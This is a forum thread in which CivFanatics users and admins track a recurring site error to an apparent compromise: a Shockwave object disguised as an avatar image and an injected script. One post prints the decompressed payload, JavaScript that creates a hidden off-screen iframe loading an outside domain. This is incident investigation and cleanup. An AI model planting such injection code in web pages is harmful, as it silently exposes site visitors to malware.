Civfanatics problems

[PlutonianEmpire]

Unable to add cookies, header already sent.
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code
Line: 156

Same here. For me, I didn't need to restart my whole browser, I just hit Reload and it loaded fine. As far as I can tell, it only happens when I go to CFC for the first time after starting up FF. Each subsequent visit in the same session is fine.

 

[leif erikson]

Just received the same message myself entering the main site through a bookmarked link. Reloaded the page, got onto the site and when I logged in, it did it again and reloading allowed my to log in and use the site.

 

[ori]

Now received that same message also - going to usercp...

 

[Maniacal]

Just had it as well when refreshing All Other Games. Site went back to its normal sluggishness after I hit reload.

 

[The_J]

Same here.
Came to CFC via directly typing in the forums.civfanatics url.

NoScript indicates that additional JavaScript from halifaxid.com would normally have been loaded. -> not normal JavaScript for CFC.

EDIT:

That halifaxid entry hasn't been there before.

 

[The_J]

NoScript indicates that additional JavaScript from halifaxid.com would normally have been loaded. -> not normal JavaScript for CFC.

Doesn't seem to be always loaded.



Also:

Spoiler :

The shockwave object is still there, seems to be related to the mentioned javascript file there.

EDIT: The shockwave flash is in /images/customavatars/test.jpg.
Does that mean the malicious code was introduced via a custom avatar o_O?

EDIT2: This image contains a compressed shockwave header, is therefore indeed a shockwave object.

 

[Camikaze]

I also received that message, using Chrome.

 

[The_J]

EDIT: The shockwave flash is in /images/customavatars/test.jpg.
Does that mean the malicious code was introduced via a custom avatar o_O?

EDIT2: This image contains a compressed shockwave header, is therefore indeed a shockwave object.

-> after decompressing it (mind, I don't have any clue about shockwave), it seems that there's a frame in the shockwave, which itself loads an iframe from halixafid.com

createElement('div');divTag.id='ADV-972';document.body.appendChild(divTag);var I972=document.createElement('iframe');I972.width='659px';I972.height='147px';I972.style.position = 'absolute';I972.style.left = '-7415px';I972.setAttribute('src','http://halifaxid.com/?ts');document.getElementById('ADV-972').appendChild(I972);}

Not sure what this means, but it's definitely bad.

The image/swf-object should be deleted/moved/backed up, just in case, and it should be found out how it came on the server.


EDIT:
Only google hit for that specific domain is at a mailing list of viruswatch....

 

[ainwood]

Ok - thanks. Squashed a couple more.... Have alerted our hosts to do a more thorough review.

 

[Playsoneasy]

I have Internet Explorer 11. When I try to go to the Civfanatics website I see:

Unable to add cookies, header already sent.
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code
Line: 156

If I then open up the Civfanatics website in Chrome, I am able to open it up in IE as well. Is it my IE settings? Compatibility issues?

Moderator Action: Not a Civ5 issue. Moved to Site Feedback.

I get the same thing too. A quick fix for me is to simply refresh the webpage, I don't know if that works for any one else.

 

[The_J]

Ok - thanks. Squashed a couple more.... Have alerted our hosts to do a more thorough review.

Great .

You should remove the /clientscript/vbulletin_css/style-944ecf91-00003.js or disable it (or check what the heck it does), because it's still trying to load the swf object.
Okay, it can't anymore, gives an internal 404, but if that's removed, I guess the error message itself should also go away.

 

[NinjaCow64]

I get the same thing too. A quick fix for me is to simply refresh the webpage, I don't know if that works for any one else.

Yeah works for me too.

 

[IglooDame]

Same error for me a few minutes ago, then retrying with a slightly different URL worked fine.

 

[Adjuvant]

I can duplicate this by closing all browsers, open one, google civfanatics, click url.

It's obviously problem code in vBulletin itself or advertisement banners, probably assessing advertisement "effectiveness". When you refresh, you get different ad banners without the bad script.

 

[ainwood]

Great .

You should remove the /clientscript/vbulletin_css/style-944ecf91-00003.js or disable it (or check what the heck it does), because it's still trying to load the swf object.
Okay, it can't anymore, gives an internal 404, but if that's removed, I guess the error message itself should also go away.

Removed that last night. Bit I cant find is where the reference to it is being added at page load.

 

[The_J]

mmhh...normally I'd say that I'll also take a look, but I don't get the error anymore, and the cookies are also missing that halifax tag .

 

[Sisiutil]

I'm getting the same error all the time in Firefox. Annoying.

 

[ainwood]

If anyone is still getting this, can they please right-click on the page, "view source" and post the contents?

 

[ori]

had to clear cookies by logging out:

Spoiler :

<script src="/clientscript/vbulletin_css/style-944ecf91-00003.js"></script>
<html xmlns="http://www.w3.org/1999/xhtml" dir="" lang="">
<head>


<title>Civilization Fanatics' Forums</title>

</head>
<body>


<br /><br /><br />


<table class="tborder" cellpadding="" cellspacing="" border="0" width="70%" align="center">
<tr>
<td class="tcat"></td>
</tr>
<tr>
<td class="panelsurround" align="center">
<div class="panel">
<div align="">


<!-- main error message -->


<div style="margin: 10px">Unable to add cookies, header already sent.<br />
File: /usr/local/etc/httpd/forums.civfanatics.com/includes/init.php(298) : eval()'d code<br />
Line: 157<br /></div>


<!-- / main error message -->


</div>
</div>
<!--
<div style="margin-topx">
<input type="submit" class="button" value="" accesskey="s" onclick="history.back(1); return false" />
</div>
-->
</td>
</tr>
</table>

<br />


<!-- forum jump -->
<table cellpadding="0" cellspacing="0" border="0" align="center">
<tr>
<td></td>
</tr>
</table>
<!-- / forum jump -->


<br />



</body>
</html>

 

[ori]

two more things going into the logs:

The requested URL /clientscript/vbulletin_css/style-944ecf91-00003.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

also the google secure browing api seems to be on to the site - as both goog-malware-shavar and goog-phish-shavar hash tags are sent along with the site request, which may cause trouble down the line if it does indeed identify this site as infected as I understand the descriptions (though I did not delve deeply enough into the api docs to know exactly what those actually mean).